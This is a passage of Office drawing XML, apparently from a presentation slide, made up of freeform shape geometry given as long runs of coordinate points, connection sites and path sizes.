                    <a:pt x="82" y="19"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="85" y="17"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="91" y="15"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="95" y="11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0" y="7"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="116" y="7"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="120" y="5"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="125" y="5"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="135" y="2"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="142" y="2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5"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="175" y="7"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="177" y="11"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="179" y="17"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="182" y="21"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="182" y="26"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="186" y="32"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="188" y="38"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="192" y="43"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="194" y="49"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="199" y="55"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="201" y="62"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="207" y="68"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="211" y="74"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="217" y="80"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="220" y="85"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="226" y="89"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="232" y="95"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="236" y="99"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="241" y="102"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="247" y="108"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="255" y="114"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="262" y="118"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="268" y="121"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="270" y="123"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="268" y="123"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="266" y="123"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="262" y="123"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="256" y="125"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="251" y="125"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="243" y="127"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="236" y="131"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="228" y="135"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="218" y="137"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="209" y="140"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="199" y="144"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="192" y="150"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="182" y="156"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="175" y="161"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="169" y="167"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="163" y="175"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="158" y="180"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="156" y="188"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="152" y="198"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="148" y="205"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="146" y="213"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="144" y="222"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="142" y="230"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="142" y="239"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="141" y="247"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="139" y="255"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="139" y="260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="139" y="268"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="139" y="272"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="139" y="276"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="139" y="277"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="139" y="279"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="139" y="277"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="135" y="270"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="131" y="266"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="129" y="262"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="123" y="257"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="120" y="251"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="116" y="245"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="110" y="239"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="104" y="232"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="101" y="228"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="95" y="220"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="89" y="215"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="84" y="209"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="78" y="205"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="70" y="199"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="63" y="194"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="57" y="188"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="49" y="184"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="44" y="179"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="38" y="175"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="30" y="169"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="25" y="165"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="19" y="161"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="15" y="158"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9" y="154"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7" y="152"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2" y="148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4663" y="1688"/>
              <a:ext cx="124" cy="213"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="0">
                  <a:pos x="10" y="162"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="6" y="179"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="4" y="196"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="2" y="212"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="0" y="229"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="0" y="246"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="0" y="265"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="0" y="284"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="4" y="303"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="8" y="320"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="15" y="337"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="23" y="354"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="31" y="369"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="40" y="383"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="53" y="402"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="67" y="419"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="72" y="426"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="86" y="417"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="107" y="407"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="131" y="390"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="158" y="371"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="183" y="350"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="205" y="331"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="222" y="314"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="238" y="301"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="247" y="291"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="243" y="282"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="230" y="265"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="219" y="244"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="209" y="221"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="203" y="208"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="202" y="193"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="198" y="175"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="196" y="156"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="194" y="134"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="192" y="111"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="192" y="86"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="192" y="65"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="192" y="44"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="192" y="25"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="192" y="12"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="192" y="0"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="190" y="2"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="177" y="16"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="160" y="37"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="137" y="59"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="112" y="82"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="89" y="99"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="76" y="107"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="51" y="122"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="34" y="139"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="19" y="149"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="12" y="158"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="0" t="0" r="r" b="b"/>
              <a:pathLst>
                <a:path w="249" h="426">
                  <a:moveTo>
                    <a:pt x="12" y="158"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="12" y="158"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10" y="162"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10" y="166"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8" y="172"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6" y="179"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6" y="187"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4" y="191"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4" y="196"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2" y="202"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2" y="208"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2" y="212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0" y="229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53"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="259"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="265"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0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2" y="291"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2" y="297"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4" y="303"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6" y="309"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8" y="314"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8" y="320"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10" y="326"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12" y="331"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="15" y="337"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="17" y="343"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="19" y="348"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="23" y="354"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="25" y="358"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="27" y="364"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="31" y="369"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="34" y="373"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="36" y="379"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="40" y="383"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="42" y="388"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="48" y="394"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="53" y="402"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="57" y="409"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="63" y="415"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="67" y="419"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="70" y="423"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="70" y="425"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="72" y="426"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="74" y="425"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="82" y="421"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="86" y="417"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="93" y="415"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="99" y="409"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="107" y="407"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="114" y="400"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="124" y="396"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="131" y="390"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="141" y="385"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="150" y="377"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="158" y="371"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="167" y="364"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="177" y="358"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="183" y="350"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="190" y="343"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="198" y="335"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="205" y="331"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="211" y="324"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="219" y="318"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="222" y="314"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="228" y="309"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="232" y="305"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="238" y="301"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="240" y="297"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="243" y="293"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="247" y="291"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="249" y="290"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="247" y="288"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="243" y="282"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="238" y="276"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="236" y="272"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="230" y="265"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="228" y="259"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="222" y="251"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="219" y="244"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="213" y="236"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="211" y="227"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="209" y="221"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="207" y="217"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="205" y="212"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="203" y="208"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="203" y="202"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="202" y="198"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="202" y="193"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="202" y="189"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="200" y="183"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="198" y="175"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="196" y="170"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="196" y="164"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="196" y="156"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="194" y="149"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="194" y="141"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="194" y="134"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="194" y="126"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="194" y="118"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="192" y="111"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="192" y="103"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="192" y="96"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="192" y="86"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="192" y="78"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="192" y="73"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="192" y="65"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="192" y="57"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="192" y="50"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="192" y="44"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="192" y="37"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="192" y="31"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="192" y="25"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="192" y="21"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="192" y="16"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="192" y="12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0" y="2"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="186" y="6"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="183" y="10"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="177" y="16"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="173" y="21"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="167" y="29"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="160" y="37"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="152" y="44"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="145" y="52"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="137" y="59"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="129" y="67"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="120" y="75"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="112" y="82"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="103" y="90"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="95" y="96"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="89" y="99"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="84" y="101"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="80" y="103"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="76" y="107"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="69" y="113"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="61" y="118"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="51" y="122"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="46" y="128"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="40" y="134"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="34" y="139"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="29" y="141"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="25" y="147"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="19" y="149"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="17" y="153"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="13" y="156"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12" y="158"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12" y="158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0"/>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4849" y="1663"/>
              <a:ext cx="116" cy="157"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="0">
                  <a:pos x="91" y="2"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="74" y="15"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="51" y="38"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="36" y="53"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="26" y="68"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="15" y="84"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="7" y="101"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="2" y="118"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="0" y="135"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="0" y="154"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="3" y="173"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="7" y="192"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="13" y="211"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="21" y="228"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="26" y="243"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="36" y="266"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="41" y="276"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="49" y="276"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="66" y="278"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="83" y="280"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="104" y="285"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="127" y="291"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="150" y="299"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="171" y="304"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="190" y="310"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="205" y="314"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="205" y="312"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="201" y="297"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="193" y="278"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="186" y="251"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="182" y="234"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="182" y="215"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="182" y="196"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="184" y="179"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="190" y="165"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="201" y="139"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="216" y="118"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="228" y="101"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="226" y="93"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="207" y="76"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="192" y="63"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="174" y="49"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="154" y="36"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="133" y="23"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="117" y="13"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="104" y="6"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="95" y="0"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="0" t="0" r="r" b="b"/>
              <a:pathLst>
                <a:path w="231" h="314">
                  <a:moveTo>
                    <a:pt x="95" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="93" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="91" y="2"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="85" y="6"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="79" y="9"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="74" y="15"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="66" y="23"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="59" y="28"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="51" y="38"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="45" y="44"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="41" y="48"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="36" y="53"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="34" y="57"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="28" y="63"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="26" y="68"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="21" y="72"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="19" y="80"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="15" y="84"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="11" y="89"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9" y="95"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7" y="101"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5" y="106"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3" y="112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0" y="143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2" y="162"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2" y="167"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3" y="173"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5" y="179"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5" y="186"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7" y="192"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9" y="198"/>
